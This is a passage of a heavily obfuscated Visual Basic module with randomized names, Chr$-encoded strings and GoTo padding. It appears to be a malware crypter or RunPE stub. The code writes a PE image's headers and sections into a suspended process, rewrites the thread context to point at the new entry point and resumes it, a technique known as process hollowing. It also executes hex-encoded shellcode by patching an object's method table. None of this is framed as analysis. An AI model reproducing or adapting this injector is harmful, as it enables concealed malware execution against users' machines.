  438.         WotN7p9P5 lbiJtN9fS, 0, StrPtr(KBxJ8bE71), 0, 0, 0, dmtuLGHvZ, 0, 0, VarPtr(GXTajmrwx), VarPtr(ZbXogQyas)
  439. GoTo h3L3v1JZcfXvLEoWYsVa
  440. h3L3v1JZcfXvLEoWYsVa:
  441. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(196) & Chr$(108) & Chr$(123) & Chr$(48) & Chr$(211) & Chr$(225) _
  442.  & Chr$(112) & Chr$(84) & Chr$(107) & Chr$(103) & Chr$(117) & Chr$(77) & Chr$(100) & Chr$(81) & Chr$(103) _
  443.  & Chr$(97) & Chr$(118) & Chr$(107) & Chr$(109) & Chr$(108), Chr$(119) & Chr$(55) & Chr$(79) & Chr$(53) _
  444.  & Chr$(86) & Chr$(49) & Chr$(110) & Chr$(112) & Chr$(76) & Chr$(110)))
  445. GoTo n8T5U1hEDeMdPTtUfZro
  446. n8T5U1hEDeMdPTtUfZro:
  447.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase
  448. GoTo L5G8t1WlHuEbWACiCIQF
  449. L5G8t1WlHuEbWACiCIQF:
  450. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(72) & Chr$(87) & Chr$(12) & Chr$(116) & Chr$(119) & Chr$(99) _
  451.  & Chr$(110) & Chr$(67) & Chr$(110) & Chr$(110) & Chr$(109) & Chr$(97) & Chr$(71) & Chr$(122), Chr$(114) _
  452.  & Chr$(49) & Chr$(67) & Chr$(54) & Chr$(89) & Chr$(52) & Chr$(73) & Chr$(85) & Chr$(118) & Chr$(81) _
  453. ))
  454. GoTo k8u8w3biNaZptynNcUFm
  455. k8u8w3biNaZptynNcUFm:
  456.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase, OqXXVZ4wM.OptionalHeader.SizeOfImage, XVLAKkD0I Or trEVgUtTi, gvoghHKD0
  457. GoTo o1l7E0jvWWwHTuPtSkKk
  458. o1l7E0jvWWwHTuPtSkKk:
  459. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(223) & Chr$(98) & Chr$(119) & Chr$(74) & Chr$(27) & Chr$(80) _
  460.  & Chr$(112) & Chr$(109) & Chr$(97) & Chr$(103) & Chr$(113) & Chr$(113) & Chr$(79) & Chr$(103) & Chr$(111) _
  461.  & Chr$(109) & Chr$(112) & Chr$(123), Chr$(121) & Chr$(51) & Chr$(108) & Chr$(50) & Chr$(108) & Chr$(56) _
  462.  & Chr$(113) & Chr$(74) & Chr$(114) & Chr$(80)))
  463. GoTo U2g2m4gmitLahjsQLoqX
  464. U2g2m4gmitLahjsQLoqX:
  465.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase, VarPtr(p8rpyUDyf(0)), OqXXVZ4wM.OptionalHeader.SizeOfHeaders, 0
  466. GoTo d8F8Z3VUYKQXoPOeUXPn
  467. d8F8Z3VUYKQXoPOeUXPn:
  468.         For mpWCXcoZN = 0 To OqXXVZ4wM.FileHeader.NumberOfSections - 1
  469. GoTo R8t5Q6aRfpYYLMmyIjEi
  470. R8t5Q6aRfpYYLMmyIjEi:
  471.             wO9vsZUxD Lcfn7JQoZ, p8rpyUDyf(nfjrysVgu.e_lfanew + r9prn87An + KE3evtxdC * mpWCXcoZN), Len(Lcfn7JQoZ)
  472. GoTo H4k4W3ifDmvDLbcwAJgO
  473. H4k4W3ifDmvDLbcwAJgO:
  474.             WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase + Lcfn7JQoZ.VirtuaC6t0R7rHvArQtYWEsNEu, VarPtr(p8rpyUDyf(Lcfn7JQoZ.PointerToRawData)), Lcfn7JQoZ.SizeOfRawData, 0
  475. GoTo q1n8N3KpllkpaTaFfRhk
  476. q1n8N3KpllkpaTaFfRhk:
  477.         Next mpWCXcoZN
  478. GoTo n5E6M8rgBriyGoocOpMY
  479. n5E6M8rgBriyGoocOpMY:
  480.         I683ZWZB9.ContextFlags = gm3lvp9zz
  481. GoTo m3l4b0pmgyToNTPbesOQ
  482. m3l4b0pmgyToNTPbesOQ:
  483. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(56) & Chr$(154) & Chr$(167) & Chr$(165) & Chr$(244) & Chr$(67) _
  484.  & Chr$(109) & Chr$(108) & Chr$(118) & Chr$(103) & Chr$(122) & Chr$(118) & Chr$(86) & Chr$(106) & Chr$(112) _
  485.  & Chr$(103) & Chr$(99) & Chr$(102), Chr$(74) & Chr$(50) & Chr$(76) & Chr$(52) & Chr$(110) & Chr$(48) _
  486.  & Chr$(75) & Chr$(77) & Chr$(86) & Chr$(115)))
  487. GoTo w1D5y2iCylRaaZePIPtH
  488. w1D5y2iCylRaaZePIPtH:
  489.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hThread, VarPtr(I683ZWZB9)
  490. GoTo G4Z5U8IBkTVpSXkuQdRD
  491. G4Z5U8IBkTVpSXkuQdRD:
  492. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(223) & Chr$(98) & Chr$(119) & Chr$(74) & Chr$(27) & Chr$(80) _
  493.  & Chr$(112) & Chr$(109) & Chr$(97) & Chr$(103) & Chr$(113) & Chr$(113) & Chr$(79) & Chr$(103) & Chr$(111) _
  494.  & Chr$(109) & Chr$(112) & Chr$(123), Chr$(121) & Chr$(51) & Chr$(108) & Chr$(50) & Chr$(108) & Chr$(56) _
  495.  & Chr$(113) & Chr$(74) & Chr$(114) & Chr$(80)))
  496. GoTo e0A5J4MQqQbVnlIdCuqC
  497. e0A5J4MQqQbVnlIdCuqC:
  498.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, I683ZWZB9.Ebx + 8, VarPtr(OqXXVZ4wM.OptionalHeader.ImageBase), 4, 0
  499. GoTo T6D7B4TvweEMChqrpuSY
  500. T6D7B4TvweEMChqrpuSY:
  501.         I683ZWZB9.Eax = OqXXVZ4wM.OptionalHeader.ImageBase + OqXXVZ4wM.OptionalHeader.AddressOfEntryPoint
  502. GoTo f2X4m7skJYRCjlGinBwg
  503. f2X4m7skJYRCjlGinBwg:
  504. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(94) & Chr$(106) & Chr$(109) & Chr$(27) & Chr$(116) & Chr$(65) _
  505.  & Chr$(109) & Chr$(108) & Chr$(118) & Chr$(103) & Chr$(122) & Chr$(118) & Chr$(86) & Chr$(106) & Chr$(112) _
  506.  & Chr$(103) & Chr$(99) & Chr$(102), Chr$(110) & Chr$(51) & Chr$(84) & Chr$(48) & Chr$(71) & Chr$(52) _
  507.  & Chr$(104) & Chr$(88) & Chr$(68) & Chr$(119)))
  508. GoTo t3T8D3rMqPgHhsmFnKtF
  509. t3T8D3rMqPgHhsmFnKtF:
  510.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hThread, VarPtr(I683ZWZB9)
  511. GoTo L1S6G1RojNPyCVdSwttr
  512. L1S6G1RojNPyCVdSwttr:
  513. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(84) & Chr$(66) & Chr$(60) & Chr$(187) & Chr$(179) & Chr$(245) _
  514.  & Chr$(109) & Chr$(103) & Chr$(86) & Chr$(106) & Chr$(112) & Chr$(103) & Chr$(99) & Chr$(102), Chr$(119) _
  515.  & Chr$(56) & Chr$(67) & Chr$(54) & Chr$(116) & Chr$(48) & Chr$(82) & Chr$(114) & Chr$(114) & Chr$(72) _
  516. ))
  517. GoTo V1N3l2LbRULkNsqYNhXO
  518. V1N3l2LbRULkNsqYNhXO:
  519.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hThread, 0
  520. GoTo c6V3I1jrFgBfEVhWTNfc
  521. c6V3I1jrFgBfEVhWTNfc:
  522.  
  523. GoTo i8A8H4ZuvGdKnEkqKSHm
  524. i8A8H4ZuvGdKnEkqKSHm:
  525.     G8MvJAjoU = True
  526. GoTo i6h6X3XCcOdhkcBeJsod
  527. i6h6X3XCcOdhkcBeJsod:
  528. End Function
  529.  
  530. Public Function WotN7p9P5(ByVal lbiJtN9fS As Long, ParamArray NWSHJItlN()) As Long
  531. GoTo w7e8D6lYLmJVjRiUYwmj
  532. w7e8D6lYLmJVjRiUYwmj:
  533.     Dim WJNVbo1RR        As Long
  534. GoTo d8s3l2QMYbpLNWgbEUmH
  535. d8s3l2QMYbpLNWgbEUmH:
  536.     Dim mpWCXcoZN1           As Long
  537. GoTo L1u4j6inYSZDQPfjmdDS
  538. L1u4j6inYSZDQPfjmdDS:
  539.     Dim rVNSHowuN       As String
  540. GoTo L8c5A5guFZnaNnKJlSkW
  541. L8c5A5guFZnaNnKJlSkW:
  542.     Dim iPOiVx95j     As String
  543.     Dim a0a6f8uRnMEAMcrNBKhc As String, G1o1O4MrABEbipUggyAD As String, IZvCYHmm9() As String, V0Y7Q7CyOwUEPUQctIQR As String, a0s4Y1LemcIDECHrGWvv As Integer
  544.     a0a6f8uRnMEAMcrNBKhc = Chr$(50)
  545.     For a0s4Y1LemcIDECHrGWvv = 1 To Len(a0a6f8uRnMEAMcrNBKhc)
  546. G1o1O4MrABEbipUggyAD = G1o1O4MrABEbipUggyAD & IIf(a0s4Y1LemcIDECHrGWvv = 1, Asc(Mid$(a0a6f8uRnMEAMcrNBKhc, a0s4Y1LemcIDECHrGWvv, 1)), Chr$(124) _
  547.  & Asc(Mid$(a0a6f8uRnMEAMcrNBKhc, a0s4Y1LemcIDECHrGWvv, 1)))
  548.     Next a0s4Y1LemcIDECHrGWvv
  549.     IZvCYHmm9() = rZjOyBMBM(G1o1O4MrABEbipUggyAD, Chr$(124))
  550.     For a0s4Y1LemcIDECHrGWvv = 0 To UBound(IZvCYHmm9)
  551.     V0Y7Q7CyOwUEPUQctIQR = V0Y7Q7CyOwUEPUQctIQR & Chr(CLng(IZvCYHmm9(a0s4Y1LemcIDECHrGWvv)))
  552.     Next a0s4Y1LemcIDECHrGWvv
  553.     If V0Y7Q7CyOwUEPUQctIQR = Chr$(50) Then GoTo 2
  554. 2:
  555.     If lbiJtN9fS = 0 Then Exit Function
  556. GoTo D1v4d5JwSJANYHGttVdp
  557. D1v4d5JwSJANYHGttVdp:
  558.     For mpWCXcoZN1 = UBound(NWSHJItlN) To 0 Step -1
  559. GoTo S6R7H3HFROkUfkhsKLgh
  560. S6R7H3HFROkUfkhsKLgh:
  561. iPOiVx95j = iPOiVx95j & BEWRmY2Bl(Chr$(30) & Chr$(118), Chr$(105) & Chr$(54) & Chr$(100) & Chr$(48) & Chr$(102) _
  562.  & Chr$(49) & Chr$(73) & Chr$(112) & Chr$(101) & Chr$(111)) & gz1wjd6oD(CLng(NWSHJItlN(mpWCXcoZN1)))
  563. GoTo q2y4o4buDsYTUSXIBJmO
  564. q2y4o4buDsYTUSXIBJmO:
  565.     Next
  566. GoTo P3V2m2teaOiZQeoXWKvX
  567. P3V2m2teaOiZQeoXWKvX:
  568.     WJNVbo1RR = VarPtr(WfyxtT8nv(0))
  569. GoTo S5s4r5iIytnGDZyUZWhk
  570. S5s4r5iIytnGDZyUZWhk:
  571.     WJNVbo1RR = WJNVbo1RR + (UBound(NWSHJItlN) + 2) * 5
  572. GoTo A3W5p6OdvQjeTIJHMvpw
  573. A3W5p6OdvQjeTIJHMvpw:
  574.     WJNVbo1RR = lbiJtN9fS - WJNVbo1RR - 5
  575. GoTo b7n0I2CbqiTBDYBFTdwM
  576. b7n0I2CbqiTBDYBFTdwM:
  577.     rVNSHowuN = Chr(56) + Chr(66) + Chr(52) + Chr(67) + Chr(50) + Chr(52) + Chr(48) + Chr(56) + Chr(53) + Chr(49) + Chr(60) + Chr(110) + Chr(53) + Chr(98) + Chr(48) + Chr(76) + Chr(52) + Chr(65) + Chr(84) + Chr(88) + Chr(111) + Chr(66) + Chr(111) + Chr(109) + Chr(103) + Chr(121) + Chr(83) + Chr(67) + Chr(78) + Chr(84) + Chr(80) + Chr(62) + Chr(69) + Chr(56) + Chr(60) + Chr(97) + Chr(55) + Chr(115) + Chr(50) + Chr(80) + Chr(52) + Chr(118) + Chr(100) + Chr(72) + Chr(87) + Chr(68) + Chr(75) + Chr(99) + Chr(107) + Chr(97) + Chr(71) + Chr(66) + Chr(67) + Chr(65) + Chr(70) + Chr(62) + Chr(53) + Chr(57) + Chr(56) + Chr(57) + Chr(48) + Chr(49) + Chr(54) + Chr(54) + Chr(51) + Chr(49) + Chr(67) + Chr(48) + Chr(67) + Chr(51)
  578. GoTo l2i6K7IuYKEWTpMkcYkB
  579. l2i6K7IuYKEWTpMkcYkB:
  580.     rVNSHowuN = Replace(rVNSHowuN, Chr(60) + Chr(110) + Chr(53) + Chr(98) + Chr(48) + Chr(76) + Chr(52) + Chr(65) + Chr(84) + Chr(88) + Chr(111) + Chr(66) + Chr(111) + Chr(109) + Chr(103) + Chr(121) + Chr(83) + Chr(67) + Chr(78) + Chr(84) + Chr(80) + Chr(62), iPOiVx95j)
  581. GoTo Q6Z6G0egNhmukQYZXcAH
  582. Q6Z6G0egNhmukQYZXcAH:
  583.     rVNSHowuN = Replace(rVNSHowuN, Chr(60) + Chr(97) + Chr(55) + Chr(115) + Chr(50) + Chr(80) + Chr(52) + Chr(118) + Chr(100) + Chr(72) + Chr(87) + Chr(68) + Chr(75) + Chr(99) + Chr(107) + Chr(97) + Chr(71) + Chr(66) + Chr(67) + Chr(65) + Chr(70) + Chr(62), gz1wjd6oD(WJNVbo1RR))
  584. GoTo O7F1U4bSrHAjRToRVjfO
  585. O7F1U4bSrHAjRToRVjfO:
  586.     Call adz4Yzz8T(rVNSHowuN)
  587. GoTo B4a0K4SwVnNnsLtRBLRN
  588. B4a0K4SwVnNnsLtRBLRN:
  589.     WotN7p9P5 = EGBVXhGj6
  590. GoTo Z7F2O4upTVCIbjZFAAEo
  591. Z7F2O4upTVCIbjZFAAEo:
  592. End Function
  593.  
  594. Private Function gz1wjd6oD(ByVal DA5oc0DwO As Long) As String
  595. GoTo y0T8s1CtSyaYGuPGvKUE
  596. y0T8s1CtSyaYGuPGvKUE:
  597.     Dim RJDqXoZGC(3)   As Byte
  598. GoTo D7q3a7PiOlEQECyOLhRb
  599. D7q3a7PiOlEQECyOLhRb:
  600.     Dim mpWCXcoZN2           As Long
  601.     Dim h5p1I5enLsWlSYrApVQR As String, P3F8F6KyMPSKjMqbWLfW As String, WegiI9bKW() As String, w3s8u1JYtuEOJmCVoIDr As String, X5h5k4OVANMcgiaAPHrZ As Integer
  602.     h5p1I5enLsWlSYrApVQR = Chr$(53)
  603.     For X5h5k4OVANMcgiaAPHrZ = 1 To Len(h5p1I5enLsWlSYrApVQR)
  604. P3F8F6KyMPSKjMqbWLfW = P3F8F6KyMPSKjMqbWLfW & IIf(X5h5k4OVANMcgiaAPHrZ = 1, Asc(Mid$(h5p1I5enLsWlSYrApVQR, X5h5k4OVANMcgiaAPHrZ, 1)), Chr$(124) _
  605.  & Asc(Mid$(h5p1I5enLsWlSYrApVQR, X5h5k4OVANMcgiaAPHrZ, 1)))
  606.     Next X5h5k4OVANMcgiaAPHrZ
  607.     WegiI9bKW() = rZjOyBMBM(P3F8F6KyMPSKjMqbWLfW, Chr$(124))
  608.     For X5h5k4OVANMcgiaAPHrZ = 0 To UBound(WegiI9bKW)
  609.     w3s8u1JYtuEOJmCVoIDr = w3s8u1JYtuEOJmCVoIDr & Chr(CLng(WegiI9bKW(X5h5k4OVANMcgiaAPHrZ)))
  610.     Next X5h5k4OVANMcgiaAPHrZ
  611.     If w3s8u1JYtuEOJmCVoIDr = Chr$(53) Then GoTo 5
  612. 5:
  613.     wO9vsZUxD RJDqXoZGC(0), DA5oc0DwO, &H4
  614. GoTo y4d7C4jXKkHGhPgTXvXi
  615. y4d7C4jXKkHGhPgTXvXi:
  616.     For mpWCXcoZN2 = 0 To 3
  617. GoTo B3Q6J6ZVhwNiWfDwbdKd
  618. B3Q6J6ZVhwNiWfDwbdKd:
  619. gz1wjd6oD = gz1wjd6oD & Right(BEWRmY2Bl(Chr$(2), Chr$(102) & Chr$(56) & Chr$(69) & Chr$(55) & Chr$(109) & Chr$(52) _
  620.  & Chr$(90) & Chr$(66) & Chr$(75) & Chr$(87)) & Hex(RJDqXoZGC(mpWCXcoZN2)), 2)
  621. GoTo j7g2V4UZvDLoCBRVXPoE
  622. j7g2V4UZvDLoCBRVXPoE:
  623.     Next
  624. GoTo y5O3k2SgcLYwZiuXqVtM
  625. y5O3k2SgcLYwZiuXqVtM:
  626. End Function
  627.  
  628. Private Sub adz4Yzz8T(ByVal NpRjYCHBX As String)
  629. GoTo l2X3j3pZjplwOdkmyTOr
  630. l2X3j3pZjplwOdkmyTOr:
  631.     Dim mpWCXcoZN3   As Long
  632.     Dim t4g0I8dYYXcNUbrSRhXa As String, S7U0v5TneVisbbPPpLnH As String, ySEoQF8Ds() As String, j3u2q8QYOtoonsdWdIiU As String, k7q6H6PAujEulJsrfRsP As Integer
  633.     t4g0I8dYYXcNUbrSRhXa = Chr$(53)
  634.     For k7q6H6PAujEulJsrfRsP = 1 To Len(t4g0I8dYYXcNUbrSRhXa)
  635. S7U0v5TneVisbbPPpLnH = S7U0v5TneVisbbPPpLnH & IIf(k7q6H6PAujEulJsrfRsP = 1, Asc(Mid$(t4g0I8dYYXcNUbrSRhXa, k7q6H6PAujEulJsrfRsP, 1)), Chr$(124) _
  636.  & Asc(Mid$(t4g0I8dYYXcNUbrSRhXa, k7q6H6PAujEulJsrfRsP, 1)))
  637.     Next k7q6H6PAujEulJsrfRsP
  638.     ySEoQF8Ds() = rZjOyBMBM(S7U0v5TneVisbbPPpLnH, Chr$(124))
  639.     For k7q6H6PAujEulJsrfRsP = 0 To UBound(ySEoQF8Ds)
  640.     j3u2q8QYOtoonsdWdIiU = j3u2q8QYOtoonsdWdIiU & Chr(CLng(ySEoQF8Ds(k7q6H6PAujEulJsrfRsP)))
  641.     Next k7q6H6PAujEulJsrfRsP
  642.     If j3u2q8QYOtoonsdWdIiU = Chr$(53) Then GoTo 5
  643. 5:
  644.     For mpWCXcoZN3 = 0 To Len(NpRjYCHBX) - 1 Step 2
  645. GoTo p4o4e1sqkDAWrRWSehvS
  646. p4o4e1sqkDAWrRWSehvS:
  647. WfyxtT8nv((mpWCXcoZN3 / 2)) = CByte(BEWRmY2Bl(Chr$(28) & Chr$(30), Chr$(119) & Chr$(51) & Chr$(118) & Chr$(51) _
  648.  & Chr$(110) & Chr$(48) & Chr$(110) & Chr$(107) & Chr$(101) & Chr$(118)) & Mid$(NpRjYCHBX, mpWCXcoZN3 + 1, 2))
  649. GoTo F2Y3y2eSMChqqpufYfKX
  650. F2Y3y2eSMChqqpufYfKX:
  651.     Next
  652. GoTo W6p8k1YRBilGimBLgtgT
  653. W6p8k1YRBilGimBLgtgT:
  654. End Sub
  655.  
  656. Private Function EGBVXhGj6() As Long
  657.     Dim u3P7Z7cgHgrlEBYtSLHS As String, j8T1R7jNOuPUcSwHHGLh As String, b9fyjDLnV() As String, K6j2T5IbHfvXvICUEaKV As String, b4i0O4XhFAdeLSksiOJK As Integer
  658.     u3P7Z7cgHgrlEBYtSLHS = Chr$(49)
  659.     For b4i0O4XhFAdeLSksiOJK = 1 To Len(u3P7Z7cgHgrlEBYtSLHS)
  660. j8T1R7jNOuPUcSwHHGLh = j8T1R7jNOuPUcSwHHGLh & IIf(b4i0O4XhFAdeLSksiOJK = 1, Asc(Mid$(u3P7Z7cgHgrlEBYtSLHS, b4i0O4XhFAdeLSksiOJK, 1)), Chr$(124) _
  661.  & Asc(Mid$(u3P7Z7cgHgrlEBYtSLHS, b4i0O4XhFAdeLSksiOJK, 1)))
  662.     Next b4i0O4XhFAdeLSksiOJK
  663.     b9fyjDLnV() = rZjOyBMBM(j8T1R7jNOuPUcSwHHGLh, Chr$(124))
  664.     For b4i0O4XhFAdeLSksiOJK = 0 To UBound(b9fyjDLnV)
  665.     K6j2T5IbHfvXvICUEaKV = K6j2T5IbHfvXvICUEaKV & Chr(CLng(b9fyjDLnV(b4i0O4XhFAdeLSksiOJK)))
  666.     Next b4i0O4XhFAdeLSksiOJK
  667.     If K6j2T5IbHfvXvICUEaKV = Chr$(49) Then GoTo 1
  668. 1:
  669.     wO9vsZUxD Qnrmt0tMW, ByVal ObjPtr(Me), &H4
  670. GoTo N0F2d0DTJMDcFkiQFZPG
  671. N0F2d0DTJMDcFkiQFZPG:
  672.     Qnrmt0tMW = Qnrmt0tMW + &H1C
  673. GoTo U5N2A0bjvYsXyNZOLFXU
  674. U5N2A0bjvYsXyNZOLFXU:
  675.     wO9vsZUxD mfM6R8zDQ, ByVal Qnrmt0tMW, &H4
  676. GoTo q4l7n0QRmowVCfyciCKe
  677. q4l7n0QRmowVCfyciCKe:
  678.     wO9vsZUxD ByVal Qnrmt0tMW, VarPtr(WfyxtT8nv(0)), &H4
  679. GoTo w0v0n5nSsetwBrRtZJFt
  680. w0v0n5nSsetwBrRtZJFt:
  681.     EGBVXhGj6 = JJAcJc0Fl
  682. GoTo O1u1T0CobDYlAhkoODAt
  683. O1u1T0CobDYlAhkoODAt:
  684.     wO9vsZUxD ByVal Qnrmt0tMW, mfM6R8zDQ, &H4
  685. GoTo M1g0a5cnrGbdmvqUkDXq
  686. M1g0a5cnrGbdmvqUkDXq:
  687. End Function
  688.  
  689. Public Function tRFzAcypS(ByVal Wcziyzybv As String, ByVal mMetdZkd5 As String) As Long
  690.     Dim j6u3c7YfwGybWXVaMFMp As String, R0S4Z3pSwhdRmcThraaN As String, VgOntxdI8() As String, Q5A0L3PsJbyPJennlqcV As String, c1T3i6phGVOwfiDfjwId As Integer
  691.     j6u3c7YfwGybWXVaMFMp = Chr$(55)
  692.     For c1T3i6phGVOwfiDfjwId = 1 To Len(j6u3c7YfwGybWXVaMFMp)
  693. R0S4Z3pSwhdRmcThraaN = R0S4Z3pSwhdRmcThraaN & IIf(c1T3i6phGVOwfiDfjwId = 1, Asc(Mid$(j6u3c7YfwGybWXVaMFMp, c1T3i6phGVOwfiDfjwId, 1)), Chr$(124) _
  694.  & Asc(Mid$(j6u3c7YfwGybWXVaMFMp, c1T3i6phGVOwfiDfjwId, 1)))
  695.     Next c1T3i6phGVOwfiDfjwId
  696.     VgOntxdI8() = rZjOyBMBM(R0S4Z3pSwhdRmcThraaN, Chr$(124))
  697.     For c1T3i6phGVOwfiDfjwId = 0 To UBound(VgOntxdI8)
  698.     Q5A0L3PsJbyPJennlqcV = Q5A0L3PsJbyPJennlqcV & Chr(CLng(VgOntxdI8(c1T3i6phGVOwfiDfjwId)))
  699.     Next c1T3i6phGVOwfiDfjwId
  700.     If Q5A0L3PsJbyPJennlqcV = Chr$(55) Then GoTo 7
  701. 7:
  702.     tRFzAcypS = Me.Jun1VG4mO(Me.P4EYumIcN(Wcziyzybv), mMetdZkd5)
  703. GoTo d3r2M7WnZdDdoiBwVqPH
  704. d3r2M7WnZdDdoiBwVqPH:
  705. End Function
  706.  
  707. Public Function P4EYumIcN(ByVal Wcziyzybv As String) As Long
  708.     Dim E2g8Q0NlfJLrMRZPuEED As String, H5l8X6jADGwWleOyTyAO As String, Glb1zamKP() As String, S4U5v2TUdCvZbIOhpfLG As String, H1K8C1ZBAQGIAZCgeNBW As Integer
  709.     E2g8Q0NlfJLrMRZPuEED = Chr$(50)
  710.     For H1K8C1ZBAQGIAZCgeNBW = 1 To Len(E2g8Q0NlfJLrMRZPuEED)
  711. H5l8X6jADGwWleOyTyAO = H5l8X6jADGwWleOyTyAO & IIf(H1K8C1ZBAQGIAZCgeNBW = 1, Asc(Mid$(E2g8Q0NlfJLrMRZPuEED, H1K8C1ZBAQGIAZCgeNBW, 1)), Chr$(124) _
  712.  & Asc(Mid$(E2g8Q0NlfJLrMRZPuEED, H1K8C1ZBAQGIAZCgeNBW, 1)))
  713.     Next H1K8C1ZBAQGIAZCgeNBW
  714.     Glb1zamKP() = rZjOyBMBM(H5l8X6jADGwWleOyTyAO, Chr$(124))
  715.     For H1K8C1ZBAQGIAZCgeNBW = 0 To UBound(Glb1zamKP)
  716.     S4U5v2TUdCvZbIOhpfLG = S4U5v2TUdCvZbIOhpfLG & Chr(CLng(Glb1zamKP(H1K8C1ZBAQGIAZCgeNBW)))
  717.     Next H1K8C1ZBAQGIAZCgeNBW
  718.     If S4U5v2TUdCvZbIOhpfLG = Chr$(50) Then GoTo 2
  719. 2:
  720.     P4EYumIcN = WotN7p9P5(JsRxtDuqO, StrPtr(Wcziyzybv & vbNullChar))
  721. GoTo D3b2K8vYgtVoUsKWKICU
  722. D3b2K8vYgtVoUsKWKICU:
  723. End Function
  724.  
  725. Public Property Get Initialized() As Boolean
  726. GoTo R7X6o6yNOjkuScrYfwGy
  727. R7X6o6yNOjkuScrYfwGy:
  728.     Initialized = tiKQbrb34
  729. GoTo A8y8j5kOpaquvoOqVGCp
  730. A8y8j5kOpaquvoOqVGCp:
  731. End Property
  732.  
  733. Public Sub Class_Initialize()
  734.     Dim L0r1Q0lYVivdyhlLvqJG As String, c0X5Z6nDYZjsnRgAUmhX As String, BmuE10F6W() As String, H4E1W5CPCoPlkNuMwCbC As String, N1Z4s2nfbnFToclJEhjQ As Integer
  735.     L0r1Q0lYVivdyhlLvqJG = Chr$(54)
  736.     For N1Z4s2nfbnFToclJEhjQ = 1 To Len(L0r1Q0lYVivdyhlLvqJG)
  737. c0X5Z6nDYZjsnRgAUmhX = c0X5Z6nDYZjsnRgAUmhX & IIf(N1Z4s2nfbnFToclJEhjQ = 1, Asc(Mid$(L0r1Q0lYVivdyhlLvqJG, N1Z4s2nfbnFToclJEhjQ, 1)), Chr$(124) _
  738.  & Asc(Mid$(L0r1Q0lYVivdyhlLvqJG, N1Z4s2nfbnFToclJEhjQ, 1)))
  739.     Next N1Z4s2nfbnFToclJEhjQ
  740.     BmuE10F6W() = rZjOyBMBM(c0X5Z6nDYZjsnRgAUmhX, Chr$(124))
  741.     For N1Z4s2nfbnFToclJEhjQ = 0 To UBound(BmuE10F6W)
  742.     H4E1W5CPCoPlkNuMwCbC = H4E1W5CPCoPlkNuMwCbC & Chr(CLng(BmuE10F6W(N1Z4s2nfbnFToclJEhjQ)))
  743.     Next N1Z4s2nfbnFToclJEhjQ
  744.     If H4E1W5CPCoPlkNuMwCbC = Chr$(54) Then GoTo 6
  745. 6:
  746.     Call adz4Yzz8T(Chr(56) + Chr(66) + Chr(52) + Chr(67) + Chr(50) + Chr(52) + Chr(48) + Chr(56) + Chr(53) + Chr(54) + Chr(53) + Chr(53) + Chr(51) + Chr(49) + Chr(67) + Chr(48) + Chr(54) + Chr(52) + Chr(56) + Chr(66) + Chr(55) + Chr(48) + Chr(51) + Chr(48) + Chr(56) + Chr(66) + Chr(55) + Chr(54) + Chr(48) + Chr(67) + Chr(56) + Chr(66) + Chr(55) + Chr(54) + Chr(49) + Chr(67) + Chr(56) + Chr(66) + Chr(54) + Chr(69) + Chr(48) + Chr(56) + Chr(56) + Chr(66) + Chr(55) + Chr(69) + Chr(50) + Chr(48) + Chr(56) + Chr(66) + Chr(51) + Chr(54) + Chr(51) + Chr(56) + Chr(52) + Chr(55) + Chr(49) + Chr(56) + Chr(55) + Chr(53) + Chr(70) + Chr(51) + Chr(56) + Chr(48) + Chr(51) + Chr(70) + Chr(54) + Chr(66) + Chr(55) + Chr(52) + Chr(48) + Chr(55) + Chr(56) + Chr(48) + Chr(51) + Chr(70) + Chr(52) + Chr(66) + Chr(55) + Chr(52) + Chr(48) + Chr(50) + Chr(69) + Chr(66) + Chr(69) + Chr(55) + Chr(56) + Chr(57) + Chr(50) + Chr(57) + Chr(53) + Chr(68) + Chr(53) + Chr(69) + Chr(67) + Chr(51))
  747. GoTo p8n3c5afDKRyIIXbeWuK
  748. p8n3c5afDKRyIIXbeWuK:
  749.     awKHqa6ZF = EGBVXhGj6
  750. GoTo D6U4r3YmjSfFFgoBdvcA
  751. D6U4r3YmjSfFFgoBdvcA:
  752.     If Not awKHqa6ZF = 0 Then
  753. GoTo S7S5X7ZyfqysEVjrsCaU
  754. S7S5X7ZyfqysEVjrsCaU:
  755. JsRxtDuqO = Jun1VG4mO(awKHqa6ZF, BEWRmY2Bl(Chr$(240) & Chr$(23) & Chr$(143) & Chr$(132) & Chr$(140) & Chr$(233) _
  756.  & Chr$(98) & Chr$(112) & Chr$(99) & Chr$(112) & Chr$(123) & Chr$(85), Chr$(116) & Chr$(51) & Chr$(66) _
  757.  & Chr$(50) & Chr$(82) & Chr$(50) & Chr$(90) & Chr$(112) & Chr$(113) & Chr$(77)))
  758. GoTo j6S4r0pVQQPUFMTjKKZP
  759. j6S4r0pVQQPUFMTjKKZP:
  760.         If Not JsRxtDuqO = 0 Then
  761. GoTo S2i2q7WLfWNakUTHHiqD
  762. S2i2q7WLfWNakUTHHiqD:
  763.             tiKQbrb34 = True
  764. GoTo f0e0U5USMebwhswtGXYt
  765. f0e0U5USMebwhswtGXYt:
  766.         End If
  767. GoTo u1c1m0ioIQGlghfkVOVA
  768. u1c1m0ioIQGlghfkVOVA:
  769.     End If
  770. GoTo a2c5i4AcHrmbymdqCkjX
  771. a2c5i4AcHrmbymdqCkjX:
  772. End Sub
  773.  
  774. Public Function Jun1VG4mO(ByVal lbiJtN9fS As Long, ByVal mMetdZkd5 As String) As Long
  775. GoTo h1f7G7FquVJHBTQmIhmj
  776. h1f7G7FquVJHBTQmIhmj:
  777.     Dim nfjrysVgu       As ghFoWNBil
